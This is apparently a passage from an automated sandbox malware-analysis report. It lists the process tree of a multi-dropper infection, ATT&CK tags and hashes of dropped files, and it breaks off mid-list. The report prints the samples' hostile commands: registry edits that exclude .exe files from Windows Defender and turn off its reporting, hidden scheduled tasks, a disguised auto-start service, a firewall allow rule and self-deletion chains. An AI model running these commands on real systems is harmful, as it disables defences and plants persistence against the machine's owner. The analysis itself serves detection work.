C:\Users\Admin\Documents\RK_4rgTt5CcW3iNxDT6xO9bL.exe"C:\Users\Admin\Documents\RK_4rgTt5CcW3iNxDT6xO9bL.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\34f5381b-d2d7-48b4-8af3-8b6f13b8fbaf.exe"C:\Users\Admin\AppData\Local\Temp\34f5381b-d2d7-48b4-8af3-8b6f13b8fbaf.exe"4⤵
- Executes dropped EXE
- Checks processor information in registry
-
C:\Users\Admin\Documents\Gzkt5mHpxF1v1F6ko7n6Ojln.exe"C:\Users\Admin\Documents\Gzkt5mHpxF1v1F6ko7n6Ojln.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif4⤵
-
C:\Windows\SysWOW64\cmd.execmd5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq BullGuardCore.exe"6⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "bullguardcore.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq PSUAService.exe"6⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "psuaservice.exe"6⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif6⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pifAccostarmi.exe.pif N6⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\8yNuAlksxt9ERCQBLnTf5R7s.exe"C:\Users\Admin\Documents\8yNuAlksxt9ERCQBLnTf5R7s.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\61TM8q9Z9OdxN8H1Dz9MigvY.exe"C:\Users\Admin\Documents\61TM8q9Z9OdxN8H1Dz9MigvY.exe"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 61TM8q9Z9OdxN8H1Dz9MigvY.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\61TM8q9Z9OdxN8H1Dz9MigvY.exe" & del C:\ProgramData\*.dll & exit4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 61TM8q9Z9OdxN8H1Dz9MigvY.exe /f5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\3C5chxgmdIM7FCOvWctXQCVO.exe"C:\Users\Admin\Documents\3C5chxgmdIM7FCOvWctXQCVO.exe"3⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#614⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5408 -s 9484⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5408 -s 9564⤵
- Program crash
-
C:\Users\Admin\Documents\PGrgYrmjIUuPTUnxq9jnhp_9.exe"C:\Users\Admin\Documents\PGrgYrmjIUuPTUnxq9jnhp_9.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"4⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\ZQfEwTalmYFjc4TLiZPAYIzG.exe"C:\Users\Admin\Documents\ZQfEwTalmYFjc4TLiZPAYIzG.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe"C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe"4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe4⤵
-
C:\Users\Admin\Documents\thSjL5N0VAxIgAXhHP6f09aM.exe"C:\Users\Admin\Documents\thSjL5N0VAxIgAXhHP6f09aM.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\QwtjZdfAu0PgtINFi4Nvj66n.exe"C:\Users\Admin\Documents\QwtjZdfAu0PgtINFi4Nvj66n.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\AMmh7Hp1kuB7JaUBXLLtucDo.exe"C:\Users\Admin\Documents\AMmh7Hp1kuB7JaUBXLLtucDo.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\lx0psHagf6RnnGkhZ0Fowal4.exe"C:\Users\Admin\Documents\lx0psHagf6RnnGkhZ0Fowal4.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\lx0psHagf6RnnGkhZ0Fowal4.exeC:\Users\Admin\Documents\lx0psHagf6RnnGkhZ0Fowal4.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\gcZHL1UuAAZsKYs16SSxBhPd.exe"C:\Users\Admin\Documents\gcZHL1UuAAZsKYs16SSxBhPd.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5532 -s 4604⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5532 -s 4684⤵
- Program crash
-
C:\Users\Admin\Documents\HxMqtYZIUVTsFBvCoEA3Pki_.exe"C:\Users\Admin\Documents\HxMqtYZIUVTsFBvCoEA3Pki_.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zSD6B6.tmp\Install.exe.\Install.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zSE60.tmp\Install.exe.\Install.exe /S /site_id "525403"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&7⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:328⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:648⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&7⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:328⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:648⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gkGvnlPWW" /SC once /ST 00:45:28 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="6⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gkGvnlPWW"6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gkGvnlPWW"6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 01:01:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\EWdrJPC.exe\" j6 /site_id 525403 /S" /V1 /F6⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\ftGHhdmXOThAq7aPthuyzF9H.exe"C:\Users\Admin\Documents\ftGHhdmXOThAq7aPthuyzF9H.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\dada.exe"C:\Users\Admin\AppData\Local\Temp\dada.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\build.exe"C:\Users\Admin\AppData\Local\Temp\build.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Cache-S-21-2946144819-3e21f723 /TR "C:\Users\Admin\AppData\Local\cache\MoUSO.exe"5⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\OXTwCzYYERQoTolMsvuosWem.exe"C:\Users\Admin\Documents\OXTwCzYYERQoTolMsvuosWem.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\jcngxsb\4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\obxzwabi.exe" C:\Windows\SysWOW64\jcngxsb\4⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create jcngxsb binPath= "C:\Windows\SysWOW64\jcngxsb\obxzwabi.exe /d\"C:\Users\Admin\Documents\OXTwCzYYERQoTolMsvuosWem.exe\"" type= own start= auto DisplayName= "wifi support"4⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description jcngxsb "wifi internet conection"4⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start jcngxsb4⤵
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul4⤵
-
C:\Users\Admin\bkkimcju.exe"C:\Users\Admin\bkkimcju.exe" /d"C:\Users\Admin\Documents\OXTwCzYYERQoTolMsvuosWem.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\irrptjqb.exe" C:\Windows\SysWOW64\jcngxsb\5⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config jcngxsb binPath= "C:\Windows\SysWOW64\jcngxsb\irrptjqb.exe /d\"C:\Users\Admin\bkkimcju.exe\""5⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start jcngxsb5⤵
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5208 -s 12205⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5704 -s 10484⤵
- Program crash
-
C:\Users\Admin\Documents\aE5gGpDGF09P287uBSM8LvUs.exe"C:\Users\Admin\Documents\aE5gGpDGF09P287uBSM8LvUs.exe"3⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Documents\aE5gGpDGF09P287uBSM8LvUs.exe4⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 05⤵
-
C:\Users\Admin\Documents\k3wOXzGlwzQprfZ7dKwqK6sN.exe"C:\Users\Admin\Documents\k3wOXzGlwzQprfZ7dKwqK6sN.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5688 -s 6244⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5688 -s 6324⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5688 -s 6604⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5688 -s 6444⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5688 -s 12244⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5688 -s 12324⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5688 -s 13044⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5688 -s 13244⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "k3wOXzGlwzQprfZ7dKwqK6sN.exe" /f & erase "C:\Users\Admin\Documents\k3wOXzGlwzQprfZ7dKwqK6sN.exe" & exit4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "k3wOXzGlwzQprfZ7dKwqK6sN.exe" /f5⤵
- Kills process with taskkill
-
[depth 4] C:\Windows\SysWOW64\WerFault.exe
cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5688 -s 1460
- Program crash
-
[depth 3] C:\Users\Admin\Documents\4E1sEd5y60BTJLCX9pPJHvn6.exe
cmdline: "C:\Users\Admin\Documents\4E1sEd5y60BTJLCX9pPJHvn6.exe"
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
[depth 4] C:\Windows\SysWOW64\WerFault.exe
cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5680 -s 460
- Program crash
-
[depth 4] C:\Windows\SysWOW64\WerFault.exe
cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5680 -s 468
- Program crash
-
[depth 3] C:\Users\Admin\Documents\zhD7lRTUvJmwo8erfpdnVTWv.exe
cmdline: "C:\Users\Admin\Documents\zhD7lRTUvJmwo8erfpdnVTWv.exe"
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
[depth 4] C:\Users\Admin\Documents\zhD7lRTUvJmwo8erfpdnVTWv.exe
cmdline: "C:\Users\Admin\Documents\zhD7lRTUvJmwo8erfpdnVTWv.exe"
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
[depth 3] C:\Users\Admin\Documents\z63VCPkRi8gB3YlO5uw17UaM.exe
cmdline: "C:\Users\Admin\Documents\z63VCPkRi8gB3YlO5uw17UaM.exe"
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
[depth 4] C:\Windows\SysWOW64\WerFault.exe
cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5720 -s 460
- Program crash
-
[depth 4] C:\Windows\SysWOW64\WerFault.exe
cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5720 -s 468
- Program crash
-
[depth 1] C:\Windows\SysWOW64\WerFault.exe
cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3320 -ip 3320
-
[depth 1] C:\Windows\System32\CompPkgSrv.exe
cmdline: C:\Windows\System32\CompPkgSrv.exe -Embedding
-
[depth 1] C:\Windows\SysWOW64\WerFault.exe
cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3340 -ip 3340
-
[depth 1] C:\Windows\SysWOW64\WerFault.exe
cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3320 -ip 3320
-
[depth 1] C:\Windows\SysWOW64\WerFault.exe
cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3320 -ip 3320
-
[depth 1] C:\Windows\SysWOW64\WerFault.exe
cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3320 -ip 3320
-
[depth 1] C:\Windows\SysWOW64\WerFault.exe
cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3320 -ip 3320
-
[depth 1] C:\Windows\SysWOW64\WerFault.exe
cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3320 -ip 3320
-
[depth 1] C:\Windows\SysWOW64\WerFault.exe
cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 3320 -ip 3320
-
[depth 1] C:\Windows\system32\svchost.exe
cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
-
[depth 1] C:\Windows\SysWOW64\WerFault.exe
cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3320 -ip 3320
-
[depth 1] C:\Windows\SysWOW64\WerFault.exe
cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5532 -ip 5532
-
[depth 1] C:\Windows\SysWOW64\WerFault.exe
cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 5720 -ip 5720
-
[depth 1] C:\Windows\SysWOW64\WerFault.exe
cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5680 -ip 5680
-
[depth 1] C:\Windows\SysWOW64\WerFault.exe
cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 5408 -ip 5408
-
[depth 1] C:\Windows\SysWOW64\WerFault.exe
cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5688 -ip 5688
-
[depth 1] C:\Windows\SysWOW64\WerFault.exe
cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5600 -ip 5600
-
[depth 1] C:\Windows\SysWOW64\WerFault.exe
cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 6400 -ip 6400
-
[depth 1] C:\Windows\SysWOW64\WerFault.exe
cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 5532 -ip 5532
-
[depth 1] C:\Windows\SysWOW64\WerFault.exe
cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 5688 -ip 5688
-
[depth 1] C:\Windows\SysWOW64\WerFault.exe
cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5720 -ip 5720
-
[depth 1] C:\Windows\SysWOW64\WerFault.exe
cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5680 -ip 5680
-
[depth 1] C:\Windows\SysWOW64\WerFault.exe
cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5688 -ip 5688
-
[depth 1] C:\Windows\SysWOW64\WerFault.exe
cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 5704 -ip 5704
-
[depth 1] C:\Windows\SysWOW64\WerFault.exe
cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5688 -ip 5688
-
[depth 1] C:\Windows\SysWOW64\WerFault.exe
cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5208 -ip 5208
-
[depth 1] C:\Windows\SysWOW64\WerFault.exe
cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5688 -ip 5688
-
[depth 1] C:\Windows\SysWOW64\WerFault.exe
cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5408 -ip 5408
-
[depth 1] C:\Windows\SysWOW64\jcngxsb\irrptjqb.exe
cmdline: C:\Windows\SysWOW64\jcngxsb\irrptjqb.exe /d"C:\Users\Admin\bkkimcju.exe"
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
[depth 2] C:\Windows\SysWOW64\svchost.exe
cmdline: svchost.exe
-
[depth 2] C:\Windows\SysWOW64\WerFault.exe
cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7024 -s 572
- Program crash
-
[depth 1] C:\Windows\SysWOW64\WerFault.exe
cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5688 -ip 5688
-
[depth 1] C:\Windows\SysWOW64\WerFault.exe
cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 5408 -ip 5408
-
[depth 1] C:\Windows\SysWOW64\WerFault.exe
cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 7024 -ip 7024
-
[depth 1] C:\Windows\SysWOW64\WerFault.exe
cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 5688 -ip 5688
-
[depth 1] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
(the -EncodedCommand value is base64 of a UTF-16LE string; it decodes to: start-process -WindowStyle Hidden gpupdate.exe /force, which matches the gpupdate.exe child below)
- Blocklisted process makes network request
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
[depth 2] C:\Windows\system32\gpupdate.exe
cmdline: "C:\Windows\system32\gpupdate.exe" /force
-
[depth 1] C:\Windows\SysWOW64\WerFault.exe
cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5688 -ip 5688
-
[depth 1] C:\Windows\SysWOW64\WerFault.exe
cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5688 -ip 5688
-
[depth 1] C:\Windows\system32\svchost.exe
cmdline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
-
[depth 1] C:\Windows\system32\svchost.exe
cmdline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
-
[depth 1] C:\Users\Admin\AppData\Local\cache\MoUSO.exe
cmdline: C:\Users\Admin\AppData\Local\cache\MoUSO.exe
- Executes dropped EXE
-
[depth 1] C:\Windows\system32\gpscript.exe
cmdline: gpscript.exe /RefreshSystemParam
-
[depth 1] C:\Windows\SysWOW64\WerFault.exe
cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 3320 -ip 3320
-
[depth 1] C:\Windows\SysWOW64\WerFault.exe
cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3320 -ip 3320
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Persistence
- Modify Existing Service (2)
- New Service (1)
- Registry Run Keys / Startup Folder (1)
- Scheduled Task (1)
Defense Evasion
- Modify Registry (2)
- Disabling Security Tools (1)
- Virtualization/Sandbox Evasion (1)
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751MD5
54e9306f95f32e50ccd58af19753d929
SHA1eab9457321f34d4dcf7d4a0ac83edc9131bf7c57
SHA25645f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72
SHA5128711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751MD5
0e86fb9e283dbc80bcc69965d55bd261
SHA18dfba4823ebefadc04c245d373cf12d36a2bfbda
SHA2567e48cc77859fc3339d8bfad705f26ffed1be309f12b98e78b544ec71955e5d19
SHA512ec91e9b18a0af5d4ea738d36815fa54a4bdc8cdf9bd6c5e5fc0aeb8b63ace6b5510f8164ea23f4edb9871a6b85dae83630c8e6c815e7942746394451662c99f5
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datMD5
3b3ae2b28ae533bf89071e80738c60b3
SHA1339000c34cbaeced8672524882a69c2e7d87a95d
SHA256d8723fc8a20413de9be784f0903c3a1e663b482b6a192238aebc3c3fd096813a
SHA5125eee26d2d12e9169816d9a14e00972f93e1c6272e6c3a427667a92ffe7bfb403bbbb2269aedba57969473b98bc807f2e5c7f52635d8ce54d03c62aa2bec7a6a6
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.icoMD5
e5e3377341056643b0494b6842c0b544
SHA1d53fd8e256ec9d5cef8ef5387872e544a2df9108
SHA256e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25
SHA51283f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef
-
C:\Users\Admin\AppData\Local\Temp\CC4F.tmpMD5
4f3387277ccbd6d1f21ac5c07fe4ca68
SHA1e16506f662dc92023bf82def1d621497c8ab5890
SHA256767a3fc4a7a6818cdc3f0b99aaa95db694f6bcde719d2057a88b3d4df3d74fac
SHA5129da199ac69e3c0d4e0c6307e0ab8178f12cc25cb2f14c3511f6b64e6e60a925c860f3263cb38353a97b55a71ef4d27f8cb7fa3cfc08e7c1a349fd8d209dfa219
-
C:\Users\Admin\AppData\Local\Temp\Files.exeMD5
be0640d507c35efdb2fddb336643e6b6
SHA15ff26d9dcbe4ea14b02b33f31594cb2618d76257
SHA2562e3a93242b6af222b8df4413a4e6e8519114331124c2367e7604f00984835dd6
SHA512321e61479885fe5b160fb175f109cbf83295f8b5b597eeaca08075907d3bdea32206d4ffa31b9cf0d4287e85d71cb0bed94f7f6a1454ca499178c35209c6ec77
-
C:\Users\Admin\AppData\Local\Temp\Files.exeMD5
be0640d507c35efdb2fddb336643e6b6
SHA15ff26d9dcbe4ea14b02b33f31594cb2618d76257
SHA2562e3a93242b6af222b8df4413a4e6e8519114331124c2367e7604f00984835dd6
SHA512321e61479885fe5b160fb175f109cbf83295f8b5b597eeaca08075907d3bdea32206d4ffa31b9cf0d4287e85d71cb0bed94f7f6a1454ca499178c35209c6ec77
-
C:\Users\Admin\AppData\Local\Temp\Folder.exeMD5
6f247a83bc3a67c637a5ebe91fde109a
SHA1827e9e2717e04f5768da944bc87386d03fe8c732
SHA2561558f756b05cbfd9a303da3129a68cf7aeab568cc58388180d979a785296c7dd
SHA512845cb5a95fecd0aac13aa4c1e47829ba84d1329ff9c9436d673f97da52a12c6e3c802c65af95d25eaae6f3f008a8fa557df9b95017ee468d72ed7e68d02284f4
-
C:\Users\Admin\AppData\Local\Temp\Folder.exeMD5
6f247a83bc3a67c637a5ebe91fde109a
SHA1827e9e2717e04f5768da944bc87386d03fe8c732
SHA2561558f756b05cbfd9a303da3129a68cf7aeab568cc58388180d979a785296c7dd
